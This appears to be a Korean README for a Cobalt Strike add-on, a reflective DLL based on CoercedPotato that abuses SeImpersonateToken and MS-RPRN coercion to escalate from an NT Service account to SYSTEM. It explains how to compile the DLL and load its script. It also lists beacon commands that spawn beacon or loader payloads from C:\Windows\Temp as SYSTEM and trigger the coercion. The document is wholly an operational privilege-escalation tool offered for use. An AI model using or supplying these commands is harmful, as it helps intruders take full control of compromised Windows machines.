
SeImpersonateToken 권한을 이용해 NT Service에서 SYSTEM으로 권한 상승하는 Reflective DLL
SeImpersonateToken 권한과 MS-RPRN 함수를 사용하여 NT Service에서 SYSTEM으로 권한 상승.
https://github.com/Prepouce/CoercedPotato를 크게 기반으로 함.
Reflective Loader는 https://github.com/stephenfewer/ReflectiveDLLInjection에서 가져옴.
이 저장소를 클론하고 VisualStudio에서 프로젝트를 컴파일한 다음 dist/coercedpotato.cna를 CobaltStrike에 로드하세요.
먼저 다음 명령으로 RPC 리스너를 실행해야 합니다:
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
예를 들어
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
그런 다음 SYSTEM 호출을 트리거할 수 있습니다:
beacon> CoercedPotato coerce